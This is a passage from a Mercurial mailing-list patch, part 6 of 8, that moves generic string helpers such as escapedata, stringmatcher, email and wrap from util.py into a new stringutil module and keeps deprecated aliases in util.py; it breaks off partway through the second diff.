[PATCH 6 of 8] stringutil: move generic string helpers to new module
Yuya Nishihara
yuya at tcha.org
Thu Mar 22 15:01:57 UTC 2018
# HG changeset patch
# User Yuya Nishihara <yuya at tcha.org>
# Date 1521721171 -32400
# Thu Mar 22 21:19:31 2018 +0900
# Node ID 882b04a9062461a23585f3c36fa1440533addb28
# Parent 6ddd0155f4708dc1e099f0d3e8f1c668ba6419e4
stringutil: move generic string helpers to new module
Per https://phab.mercurial-scm.org/D2903#46738
URL and file paths functions are left since they are big enough to make
separate modules.
diff --git a/mercurial/util.py b/mercurial/util.py
--- a/mercurial/util.py
+++ b/mercurial/util.py
@@ -17,7 +17,6 @@ from __future__ import absolute_import,
import abc
import bz2
-import codecs
import collections
import contextlib
import errno
@@ -37,7 +36,6 @@ import stat
import subprocess
import sys
import tempfile
-import textwrap
import time
import traceback
import warnings
@@ -52,7 +50,10 @@ from . import (
pycompat,
urllibcompat,
)
-from .utils import dateutil
+from .utils import (
+ dateutil,
+ stringutil,
+)
base85 = policy.importmod(r'base85')
osutil = policy.importmod(r'osutil')
@@ -808,20 +809,6 @@ class socketproxy(object):
return object.__getattribute__(self, r'_observedcall')(
r'setsockopt', *args, **kwargs)
-_DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
-_DATA_ESCAPE_MAP.update({
- b'\\': b'\\\\',
- b'\r': br'\r',
- b'\n': br'\n',
-})
-_DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
-
-def escapedata(s):
- if isinstance(s, bytearray):
- s = bytes(s)
-
- return _DATA_ESCAPE_RE.sub(lambda m: _DATA_ESCAPE_MAP[m.group(0)], s)
-
class baseproxyobserver(object):
def _writedata(self, data):
if not self.logdata:
@@ -1567,10 +1554,6 @@ def filter(s, cmd):
return fn(s, cmd[len(name):].lstrip())
return pipefilter(s, cmd)
-def binary(s):
- """return true if a string is binary data"""
- return bool(s and '\0' in s)
-
def increasingchunks(source, min=1024, max=65536):
'''return no less than min bytes per chunk while data remains,
doubling min after each chunk until it reaches max'''
@@ -2571,102 +2554,6 @@ class cappedreader(object):
b[0:len(res)] = res
return len(res)
-def stringmatcher(pattern, casesensitive=True):
- """
- accepts a string, possibly starting with 're:' or 'literal:' prefix.
- returns the matcher name, pattern, and matcher function.
- missing or unknown prefixes are treated as literal matches.
-
- helper for tests:
- >>> def test(pattern, *tests):
- ... kind, pattern, matcher = stringmatcher(pattern)
- ... return (kind, pattern, [bool(matcher(t)) for t in tests])
- >>> def itest(pattern, *tests):
- ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
- ... return (kind, pattern, [bool(matcher(t)) for t in tests])
-
- exact matching (no prefix):
- >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
- ('literal', 'abcdefg', [False, False, True])
-
- regex matching ('re:' prefix)
- >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
- ('re', 'a.+b', [False, False, True])
-
- force exact matches ('literal:' prefix)
- >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
- ('literal', 're:foobar', [False, True])
-
- unknown prefixes are ignored and treated as literals
- >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
- ('literal', 'foo:bar', [False, False, True])
-
- case insensitive regex matches
- >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
- ('re', 'A.+b', [False, False, True])
-
- case insensitive literal matches
- >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
- ('literal', 'ABCDEFG', [False, False, True])
- """
- if pattern.startswith('re:'):
- pattern = pattern[3:]
- try:
- flags = 0
- if not casesensitive:
- flags = remod.I
- regex = remod.compile(pattern, flags)
- except remod.error as e:
- raise error.ParseError(_('invalid regular expression: %s')
- % e)
- return 're', pattern, regex.search
- elif pattern.startswith('literal:'):
- pattern = pattern[8:]
-
- match = pattern.__eq__
-
- if not casesensitive:
- ipat = encoding.lower(pattern)
- match = lambda s: ipat == encoding.lower(s)
- return 'literal', pattern, match
-
-def shortuser(user):
- """Return a short representation of a user name or email address."""
- f = user.find('@')
- if f >= 0:
- user = user[:f]
- f = user.find('<')
- if f >= 0:
- user = user[f + 1:]
- f = user.find(' ')
- if f >= 0:
- user = user[:f]
- f = user.find('.')
- if f >= 0:
- user = user[:f]
- return user
-
-def emailuser(user):
- """Return the user portion of an email address."""
- f = user.find('@')
- if f >= 0:
- user = user[:f]
- f = user.find('<')
- if f >= 0:
- user = user[f + 1:]
- return user
-
-def email(author):
- '''get email of author.'''
- r = author.find('>')
- if r == -1:
- r = None
- return author[author.find('<') + 1:r]
-
-def ellipsis(text, maxlength=400):
- """Trim string to at most maxlength (default: 400) columns in display."""
- return encoding.trim(text, maxlength, ellipsis='...')
-
def unitcountfn(*unittable):
'''return a function that renders a readable count of some quantity'''
@@ -2751,147 +2638,6 @@ else:
fromnativeeol = pycompat.identity
nativeeolwriter = pycompat.identity
-def escapestr(s):
- # call underlying function of s.encode('string_escape') directly for
- # Python 3 compatibility
- return codecs.escape_encode(s)[0]
-
-def unescapestr(s):
- return codecs.escape_decode(s)[0]
-
-def forcebytestr(obj):
- """Portably format an arbitrary object (e.g. exception) into a byte
- string."""
- try:
- return pycompat.bytestr(obj)
- except UnicodeEncodeError:
- # non-ascii string, may be lossy
- return pycompat.bytestr(encoding.strtolocal(str(obj)))
-
-def uirepr(s):
- # Avoid double backslash in Windows path repr()
- return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
-
-# delay import of textwrap
-def _MBTextWrapper(**kwargs):
- class tw(textwrap.TextWrapper):
- """
- Extend TextWrapper for width-awareness.
-
- Neither number of 'bytes' in any encoding nor 'characters' is
- appropriate to calculate terminal columns for specified string.
-
- Original TextWrapper implementation uses built-in 'len()' directly,
- so overriding is needed to use width information of each characters.
-
- In addition, characters classified into 'ambiguous' width are
- treated as wide in East Asian area, but as narrow in other.
-
- This requires use decision to determine width of such characters.
- """
- def _cutdown(self, ucstr, space_left):
- l = 0
- colwidth = encoding.ucolwidth
- for i in xrange(len(ucstr)):
- l += colwidth(ucstr[i])
- if space_left < l:
- return (ucstr[:i], ucstr[i:])
- return ucstr, ''
-
- # overriding of base class
- def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
- space_left = max(width - cur_len, 1)
-
- if self.break_long_words:
- cut, res = self._cutdown(reversed_chunks[-1], space_left)
- cur_line.append(cut)
- reversed_chunks[-1] = res
- elif not cur_line:
- cur_line.append(reversed_chunks.pop())
-
- # this overriding code is imported from TextWrapper of Python 2.6
- # to calculate columns of string by 'encoding.ucolwidth()'
- def _wrap_chunks(self, chunks):
- colwidth = encoding.ucolwidth
-
- lines = []
- if self.width <= 0:
- raise ValueError("invalid width %r (must be > 0)" % self.width)
-
- # Arrange in reverse order so items can be efficiently popped
- # from a stack of chucks.
- chunks.reverse()
-
- while chunks:
-
- # Start the list of chunks that will make up the current line.
- # cur_len is just the length of all the chunks in cur_line.
- cur_line = []
- cur_len = 0
-
- # Figure out which static string will prefix this line.
- if lines:
- indent = self.subsequent_indent
- else:
- indent = self.initial_indent
-
- # Maximum width for this line.
- width = self.width - len(indent)
-
- # First chunk on line is whitespace -- drop it, unless this
- # is the very beginning of the text (i.e. no lines started yet).
- if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
- del chunks[-1]
-
- while chunks:
- l = colwidth(chunks[-1])
-
- # Can at least squeeze this chunk onto the current line.
- if cur_len + l <= width:
- cur_line.append(chunks.pop())
- cur_len += l
-
- # Nope, this line is full.
- else:
- break
-
- # The current line is full, and the next chunk is too big to
- # fit on *any* line (not just this one).
- if chunks and colwidth(chunks[-1]) > width:
- self._handle_long_word(chunks, cur_line, cur_len, width)
-
- # If the last chunk on this line is all whitespace, drop it.
- if (self.drop_whitespace and
- cur_line and cur_line[-1].strip() == r''):
- del cur_line[-1]
-
- # Convert current line back to a string and store it in list
- # of all lines (return value).
- if cur_line:
- lines.append(indent + r''.join(cur_line))
-
- return lines
-
- global _MBTextWrapper
- _MBTextWrapper = tw
- return tw(**kwargs)
-
-def wrap(line, width, initindent='', hangindent=''):
- maxindent = max(len(hangindent), len(initindent))
- if width <= maxindent:
- # adjust for weird terminal size
- width = max(78, maxindent + 1)
- line = line.decode(pycompat.sysstr(encoding.encoding),
- pycompat.sysstr(encoding.encodingmode))
- initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
- pycompat.sysstr(encoding.encodingmode))
- hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
- pycompat.sysstr(encoding.encodingmode))
- wrapper = _MBTextWrapper(width=width,
- initial_indent=initindent,
- subsequent_indent=hangindent)
- return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
-
if (pyplatform.python_implementation() == 'CPython' and
sys.version_info < (3, 0)):
# There is an issue in CPython that some IO methods do not handle EINTR
@@ -3064,17 +2810,6 @@ def getport(port):
except socket.error:
raise Abort(_("no port number associated with service '%s'") % port)
-_booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
- '0': False, 'no': False, 'false': False, 'off': False,
- 'never': False}
-
-def parsebool(s):
- """Parse s into a boolean.
-
- If s is not a valid boolean, returns None.
- """
- return _booleans.get(s.lower(), None)
-
class url(object):
r"""Reliable URL parser.
@@ -4341,3 +4076,19 @@ parsetimezone = _deprecatedfunc(dateutil
strdate = _deprecatedfunc(dateutil.strdate, '4.6')
parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')
+
+def _deprecatedfunc(func, version): # TODO
+ return func
+escapedata = _deprecatedfunc(stringutil.escapedata, '4.6')
+binary = _deprecatedfunc(stringutil.binary, '4.6')
+stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6')
+shortuser = _deprecatedfunc(stringutil.shortuser, '4.6')
+emailuser = _deprecatedfunc(stringutil.emailuser, '4.6')
+email = _deprecatedfunc(stringutil.email, '4.6')
+ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6')
+escapestr = _deprecatedfunc(stringutil.escapestr, '4.6')
+unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6')
+forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6')
+uirepr = _deprecatedfunc(stringutil.uirepr, '4.6')
+wrap = _deprecatedfunc(stringutil.wrap, '4.6')
+parsebool = _deprecatedfunc(stringutil.parsebool, '4.6')
diff --git a/mercurial/util.py b/mercurial/utils/stringutil.py
copy from mercurial/util.py
copy to mercurial/utils/stringutil.py
--- a/mercurial/util.py
+++ b/mercurial/utils/stringutil.py
@@ -1,4 +1,4 @@
-# util.py - Mercurial utility functions and platform specific implementations
+# stringutil.py - utility for generic string formatting, parsing, etc.
#
# Copyright 2005 K. Thananchayan <thananck at yahoo.com>
# Copyright 2005-2007 Matt Mackall <mpm at selenic.com>
@@ -7,806 +7,19 @@
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
-"""Mercurial utility functions and platform specific implementations.
+from __future__ import absolute_import
-This contains helper routines that are independent of the SCM core and
-hide platform-specific details from the core.
-"""
-
-from __future__ import absolute_import, print_function
-
-import abc
-import bz2
import codecs
-import collections
-import contextlib
-import errno
-import gc
-import hashlib
-import imp
-import io
-import itertools
-import mmap
-import os
-import platform as pyplatform
import re as remod
-import shutil
-import signal
-import socket
-import stat
-import subprocess
-import sys
-import tempfile
import textwrap
-import time
-import traceback
-import warnings
-import zlib
-from . import (
+from ..i18n import _
+
+from .. import (
encoding,
error,
- i18n,
- node as nodemod,
- policy,
pycompat,
- urllibcompat,
)
-from .utils import dateutil
-
-base85 = policy.importmod(r'base85')
-osutil = policy.importmod(r'osutil')
-parsers = policy.importmod(r'parsers')
-
-b85decode = base85.b85decode
-b85encode = base85.b85encode
-
-cookielib = pycompat.cookielib
-empty = pycompat.empty
-httplib = pycompat.httplib
-pickle = pycompat.pickle
-queue = pycompat.queue
-socketserver = pycompat.socketserver
-stderr = pycompat.stderr
-stdin = pycompat.stdin
-stdout = pycompat.stdout
-bytesio = pycompat.bytesio
-# TODO deprecate stringio name, as it is a lie on Python 3.
-stringio = bytesio
-xmlrpclib = pycompat.xmlrpclib
-
-httpserver = urllibcompat.httpserver
-urlerr = urllibcompat.urlerr
-urlreq = urllibcompat.urlreq
-
-# workaround for win32mbcs
-_filenamebytestr = pycompat.bytestr
-
-def isatty(fp):
- try:
- return fp.isatty()
- except AttributeError:
- return False
-
-# glibc determines buffering on first write to stdout - if we replace a TTY
-# destined stdout with a pipe destined stdout (e.g. pager), we want line
-# buffering
-if isatty(stdout):
- stdout = os.fdopen(stdout.fileno(), r'wb', 1)
-
-if pycompat.iswindows:
- from . import windows as platform
- stdout = platform.winstdout(stdout)
-else:
- from . import posix as platform
-
-_ = i18n._
-
-bindunixsocket = platform.bindunixsocket
-cachestat = platform.cachestat
-checkexec = platform.checkexec
-checklink = platform.checklink
-copymode = platform.copymode
-executablepath = platform.executablepath
-expandglobs = platform.expandglobs
-explainexit = platform.explainexit
-findexe = platform.findexe
-getfsmountpoint = platform.getfsmountpoint
-getfstype = platform.getfstype
-gethgcmd = platform.gethgcmd
-getuser = platform.getuser
-getpid = os.getpid
-groupmembers = platform.groupmembers
-groupname = platform.groupname
-hidewindow = platform.hidewindow
-isexec = platform.isexec
-isowner = platform.isowner
-listdir = osutil.listdir
-localpath = platform.localpath
-lookupreg = platform.lookupreg
-makedir = platform.makedir
-nlinks = platform.nlinks
-normpath = platform.normpath
-normcase = platform.normcase
-normcasespec = platform.normcasespec
-normcasefallback = platform.normcasefallback
-openhardlinks = platform.openhardlinks
-oslink = platform.oslink
-parsepatchoutput = platform.parsepatchoutput
-pconvert = platform.pconvert
-poll = platform.poll
-popen = platform.popen
-posixfile = platform.posixfile
-quotecommand = platform.quotecommand
-readpipe = platform.readpipe
-rename = platform.rename
-removedirs = platform.removedirs
-samedevice = platform.samedevice
-samefile = platform.samefile
-samestat = platform.samestat
-setbinary = platform.setbinary
-setflags = platform.setflags
-setsignalhandler = platform.setsignalhandler
-shellquote = platform.shellquote
-shellsplit = platform.shellsplit
-spawndetached = platform.spawndetached
-split = platform.split
-sshargs = platform.sshargs
-statfiles = getattr(osutil, 'statfiles', platform.statfiles)
-statisexec = platform.statisexec
-statislink = platform.statislink
-testpid = platform.testpid
-umask = platform.umask
-unlink = platform.unlink
-username = platform.username
-
-try:
- recvfds = osutil.recvfds
-except AttributeError:
- pass
-try:
- setprocname = osutil.setprocname
-except AttributeError:
- pass
-try:
- unblocksignal = osutil.unblocksignal
-except AttributeError:
- pass
-
-# Python compatibility
-
-_notset = object()
-
-def safehasattr(thing, attr):
- return getattr(thing, attr, _notset) is not _notset
-
-def _rapply(f, xs):
- if xs is None:
- # assume None means non-value of optional data
- return xs
- if isinstance(xs, (list, set, tuple)):
- return type(xs)(_rapply(f, x) for x in xs)
- if isinstance(xs, dict):
- return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
- return f(xs)
-
-def rapply(f, xs):
- """Apply function recursively to every item preserving the data structure
-
- >>> def f(x):
- ... return 'f(%s)' % x
- >>> rapply(f, None) is None
- True
- >>> rapply(f, 'a')
- 'f(a)'
- >>> rapply(f, {'a'}) == {'f(a)'}
- True
- >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
- ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
-
- >>> xs = [object()]
- >>> rapply(pycompat.identity, xs) is xs
- True
- """
- if f is pycompat.identity:
- # fast path mainly for py2
- return xs
- return _rapply(f, xs)
-
-def bitsfrom(container):
- bits = 0
- for bit in container:
- bits |= bit
- return bits
-
-# python 2.6 still have deprecation warning enabled by default. We do not want
-# to display anything to standard user so detect if we are running test and
-# only use python deprecation warning in this case.
-_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
-if _dowarn:
- # explicitly unfilter our warning for python 2.7
- #
- # The option of setting PYTHONWARNINGS in the test runner was investigated.
- # However, module name set through PYTHONWARNINGS was exactly matched, so
- # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
- # makes the whole PYTHONWARNINGS thing useless for our usecase.
- warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
- warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
- warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
-if _dowarn and pycompat.ispy3:
- # silence warning emitted by passing user string to re.sub()
- warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
- r'mercurial')
- warnings.filterwarnings(r'ignore', r'invalid escape sequence',
- DeprecationWarning, r'mercurial')
-
-def nouideprecwarn(msg, version, stacklevel=1):
- """Issue an python native deprecation warning
-
- This is a noop outside of tests, use 'ui.deprecwarn' when possible.
- """
- if _dowarn:
- msg += ("\n(compatibility will be dropped after Mercurial-%s,"
- " update your code.)") % version
- warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
-
-DIGESTS = {
- 'md5': hashlib.md5,
- 'sha1': hashlib.sha1,
- 'sha512': hashlib.sha512,
-}
-# List of digest types from strongest to weakest
-DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
-
-for k in DIGESTS_BY_STRENGTH:
- assert k in DIGESTS
-
-class digester(object):
- """helper to compute digests.
-
- This helper can be used to compute one or more digests given their name.
-
- >>> d = digester([b'md5', b'sha1'])
- >>> d.update(b'foo')
- >>> [k for k in sorted(d)]
- ['md5', 'sha1']
- >>> d[b'md5']
- 'acbd18db4cc2f85cedef654fccc4a4d8'
- >>> d[b'sha1']
- '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
- >>> digester.preferred([b'md5', b'sha1'])
- 'sha1'
- """
-
- def __init__(self, digests, s=''):
- self._hashes = {}
- for k in digests:
- if k not in DIGESTS:
- raise Abort(_('unknown digest type: %s') % k)
- self._hashes[k] = DIGESTS[k]()
- if s:
- self.update(s)
-
- def update(self, data):
- for h in self._hashes.values():
- h.update(data)
-
- def __getitem__(self, key):
- if key not in DIGESTS:
- raise Abort(_('unknown digest type: %s') % k)
- return nodemod.hex(self._hashes[key].digest())
-
- def __iter__(self):
- return iter(self._hashes)
-
- @staticmethod
- def preferred(supported):
- """returns the strongest digest type in both supported and DIGESTS."""
-
- for k in DIGESTS_BY_STRENGTH:
- if k in supported:
- return k
- return None
-
-class digestchecker(object):
- """file handle wrapper that additionally checks content against a given
- size and digests.
-
- d = digestchecker(fh, size, {'md5': '...'})
-
- When multiple digests are given, all of them are validated.
- """
-
- def __init__(self, fh, size, digests):
- self._fh = fh
- self._size = size
- self._got = 0
- self._digests = dict(digests)
- self._digester = digester(self._digests.keys())
-
- def read(self, length=-1):
- content = self._fh.read(length)
- self._digester.update(content)
- self._got += len(content)
- return content
-
- def validate(self):
- if self._size != self._got:
- raise Abort(_('size mismatch: expected %d, got %d') %
- (self._size, self._got))
- for k, v in self._digests.items():
- if v != self._digester[k]:
- # i18n: first parameter is a digest name
- raise Abort(_('%s mismatch: expected %s, got %s') %
- (k, v, self._digester[k]))
-
-try:
- buffer = buffer
-except NameError:
- def buffer(sliceable, offset=0, length=None):
- if length is not None:
- return memoryview(sliceable)[offset:offset + length]
- return memoryview(sliceable)[offset:]
-
-closefds = pycompat.isposix
-
-_chunksize = 4096
-
-class bufferedinputpipe(object):
- """a manually buffered input pipe
-
- Python will not let us use buffered IO and lazy reading with 'polling' at
- the same time. We cannot probe the buffer state and select will not detect
- that data are ready to read if they are already buffered.
-
- This class let us work around that by implementing its own buffering
- (allowing efficient readline) while offering a way to know if the buffer is
- empty from the output (allowing collaboration of the buffer with polling).
-
- This class lives in the 'util' module because it makes use of the 'os'
- module from the python stdlib.
- """
- def __new__(cls, fh):
- # If we receive a fileobjectproxy, we need to use a variation of this
- # class that notifies observers about activity.
- if isinstance(fh, fileobjectproxy):
- cls = observedbufferedinputpipe
-
- return super(bufferedinputpipe, cls).__new__(cls)
-
- def __init__(self, input):
- self._input = input
- self._buffer = []
- self._eof = False
- self._lenbuf = 0
-
- @property
- def hasbuffer(self):
- """True is any data is currently buffered
-
- This will be used externally a pre-step for polling IO. If there is
- already data then no polling should be set in place."""
- return bool(self._buffer)
-
- @property
- def closed(self):
- return self._input.closed
-
- def fileno(self):
- return self._input.fileno()
-
- def close(self):
- return self._input.close()
-
- def read(self, size):
- while (not self._eof) and (self._lenbuf < size):
- self._fillbuffer()
- return self._frombuffer(size)
-
- def readline(self, *args, **kwargs):
- if 1 < len(self._buffer):
- # this should not happen because both read and readline end with a
- # _frombuffer call that collapse it.
- self._buffer = [''.join(self._buffer)]
- self._lenbuf = len(self._buffer[0])
- lfi = -1
- if self._buffer:
- lfi = self._buffer[-1].find('\n')
- while (not self._eof) and lfi < 0:
- self._fillbuffer()
- if self._buffer:
- lfi = self._buffer[-1].find('\n')
- size = lfi + 1
- if lfi < 0: # end of file
- size = self._lenbuf
- elif 1 < len(self._buffer):
- # we need to take previous chunks into account
- size += self._lenbuf - len(self._buffer[-1])
- return self._frombuffer(size)
-
- def _frombuffer(self, size):
- """return at most 'size' data from the buffer
-
- The data are removed from the buffer."""
- if size == 0 or not self._buffer:
- return ''
- buf = self._buffer[0]
- if 1 < len(self._buffer):
- buf = ''.join(self._buffer)
-
- data = buf[:size]
- buf = buf[len(data):]
- if buf:
- self._buffer = [buf]
- self._lenbuf = len(buf)
- else:
- self._buffer = []
- self._lenbuf = 0
- return data
-
- def _fillbuffer(self):
- """read data to the buffer"""
- data = os.read(self._input.fileno(), _chunksize)
- if not data:
- self._eof = True
- else:
- self._lenbuf += len(data)
- self._buffer.append(data)
-
- return data
-
-def mmapread(fp):
- try:
- fd = getattr(fp, 'fileno', lambda: fp)()
- return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
- except ValueError:
- # Empty files cannot be mmapped, but mmapread should still work. Check
- # if the file is empty, and if so, return an empty buffer.
- if os.fstat(fd).st_size == 0:
- return ''
- raise
-
-def popen2(cmd, env=None, newlines=False):
- # Setting bufsize to -1 lets the system decide the buffer size.
- # The default for bufsize is 0, meaning unbuffered. This leads to
- # poor performance on Mac OS X: http://bugs.python.org/issue4194
- p = subprocess.Popen(cmd, shell=True, bufsize=-1,
- close_fds=closefds,
- stdin=subprocess.PIPE, stdout=subprocess.PIPE,
- universal_newlines=newlines,
- env=env)
- return p.stdin, p.stdout
-
-def popen3(cmd, env=None, newlines=False):
- stdin, stdout, stderr, p = popen4(cmd, env, newlines)
- return stdin, stdout, stderr
-
-def popen4(cmd, env=None, newlines=False, bufsize=-1):
- p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
- close_fds=closefds,
- stdin=subprocess.PIPE, stdout=subprocess.PIPE,
- stderr=subprocess.PIPE,
- universal_newlines=newlines,
- env=env)
- return p.stdin, p.stdout, p.stderr, p
-
-class fileobjectproxy(object):
- """A proxy around file objects that tells a watcher when events occur.
-
- This type is intended to only be used for testing purposes. Think hard
- before using it in important code.
- """
- __slots__ = (
- r'_orig',
- r'_observer',
- )
-
- def __init__(self, fh, observer):
- object.__setattr__(self, r'_orig', fh)
- object.__setattr__(self, r'_observer', observer)
-
- def __getattribute__(self, name):
- ours = {
- r'_observer',
-
- # IOBase
- r'close',
- # closed if a property
- r'fileno',
- r'flush',
- r'isatty',
- r'readable',
- r'readline',
- r'readlines',
- r'seek',
- r'seekable',
- r'tell',
- r'truncate',
- r'writable',
- r'writelines',
- # RawIOBase
- r'read',
- r'readall',
- r'readinto',
- r'write',
- # BufferedIOBase
- # raw is a property
- r'detach',
- # read defined above
- r'read1',
- # readinto defined above
- # write defined above
- }
-
- # We only observe some methods.
- if name in ours:
- return object.__getattribute__(self, name)
-
- return getattr(object.__getattribute__(self, r'_orig'), name)
-
- def __nonzero__(self):
- return bool(object.__getattribute__(self, r'_orig'))
-
- __bool__ = __nonzero__
-
- def __delattr__(self, name):
- return delattr(object.__getattribute__(self, r'_orig'), name)
-
- def __setattr__(self, name, value):
- return setattr(object.__getattribute__(self, r'_orig'), name, value)
-
- def __iter__(self):
- return object.__getattribute__(self, r'_orig').__iter__()
-
- def _observedcall(self, name, *args, **kwargs):
- # Call the original object.
- orig = object.__getattribute__(self, r'_orig')
- res = getattr(orig, name)(*args, **kwargs)
-
- # Call a method on the observer of the same name with arguments
- # so it can react, log, etc.
- observer = object.__getattribute__(self, r'_observer')
- fn = getattr(observer, name, None)
- if fn:
- fn(res, *args, **kwargs)
-
- return res
-
- def close(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'close', *args, **kwargs)
-
- def fileno(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'fileno', *args, **kwargs)
-
- def flush(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'flush', *args, **kwargs)
-
- def isatty(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'isatty', *args, **kwargs)
-
- def readable(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'readable', *args, **kwargs)
-
- def readline(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'readline', *args, **kwargs)
-
- def readlines(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'readlines', *args, **kwargs)
-
- def seek(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'seek', *args, **kwargs)
-
- def seekable(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'seekable', *args, **kwargs)
-
- def tell(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'tell', *args, **kwargs)
-
- def truncate(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'truncate', *args, **kwargs)
-
- def writable(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'writable', *args, **kwargs)
-
- def writelines(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'writelines', *args, **kwargs)
-
- def read(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'read', *args, **kwargs)
-
- def readall(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'readall', *args, **kwargs)
-
- def readinto(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'readinto', *args, **kwargs)
-
- def write(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'write', *args, **kwargs)
-
- def detach(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'detach', *args, **kwargs)
-
- def read1(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'read1', *args, **kwargs)
-
-class observedbufferedinputpipe(bufferedinputpipe):
- """A variation of bufferedinputpipe that is aware of fileobjectproxy.
-
- ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
- bypass ``fileobjectproxy``. Because of this, we need to make
- ``bufferedinputpipe`` aware of these operations.
-
- This variation of ``bufferedinputpipe`` can notify observers about
- ``os.read()`` events. It also re-publishes other events, such as
- ``read()`` and ``readline()``.
- """
- def _fillbuffer(self):
- res = super(observedbufferedinputpipe, self)._fillbuffer()
-
- fn = getattr(self._input._observer, r'osread', None)
- if fn:
- fn(res, _chunksize)
-
- return res
-
- # We use different observer methods because the operation isn't
- # performed on the actual file object but on us.
- def read(self, size):
- res = super(observedbufferedinputpipe, self).read(size)
-
- fn = getattr(self._input._observer, r'bufferedread', None)
- if fn:
- fn(res, size)
-
- return res
-
- def readline(self, *args, **kwargs):
- res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
-
- fn = getattr(self._input._observer, r'bufferedreadline', None)
- if fn:
- fn(res)
-
- return res
-
-PROXIED_SOCKET_METHODS = {
- r'makefile',
- r'recv',
- r'recvfrom',
- r'recvfrom_into',
- r'recv_into',
- r'send',
- r'sendall',
- r'sendto',
- r'setblocking',
- r'settimeout',
- r'gettimeout',
- r'setsockopt',
-}
-
-class socketproxy(object):
- """A proxy around a socket that tells a watcher when events occur.
-
- This is like ``fileobjectproxy`` except for sockets.
-
- This type is intended to only be used for testing purposes. Think hard
- before using it in important code.
- """
- __slots__ = (
- r'_orig',
- r'_observer',
- )
-
- def __init__(self, sock, observer):
- object.__setattr__(self, r'_orig', sock)
- object.__setattr__(self, r'_observer', observer)
-
- def __getattribute__(self, name):
- if name in PROXIED_SOCKET_METHODS:
- return object.__getattribute__(self, name)
-
- return getattr(object.__getattribute__(self, r'_orig'), name)
-
- def __delattr__(self, name):
- return delattr(object.__getattribute__(self, r'_orig'), name)
-
- def __setattr__(self, name, value):
- return setattr(object.__getattribute__(self, r'_orig'), name, value)
-
- def __nonzero__(self):
- return bool(object.__getattribute__(self, r'_orig'))
-
- __bool__ = __nonzero__
-
- def _observedcall(self, name, *args, **kwargs):
- # Call the original object.
- orig = object.__getattribute__(self, r'_orig')
- res = getattr(orig, name)(*args, **kwargs)
-
- # Call a method on the observer of the same name with arguments
- # so it can react, log, etc.
- observer = object.__getattribute__(self, r'_observer')
- fn = getattr(observer, name, None)
- if fn:
- fn(res, *args, **kwargs)
-
- return res
-
- def makefile(self, *args, **kwargs):
- res = object.__getattribute__(self, r'_observedcall')(
- r'makefile', *args, **kwargs)
-
- # The file object may be used for I/O. So we turn it into a
- # proxy using our observer.
- observer = object.__getattribute__(self, r'_observer')
- return makeloggingfileobject(observer.fh, res, observer.name,
- reads=observer.reads,
- writes=observer.writes,
- logdata=observer.logdata,
- logdataapis=observer.logdataapis)
-
- def recv(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'recv', *args, **kwargs)
-
- def recvfrom(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
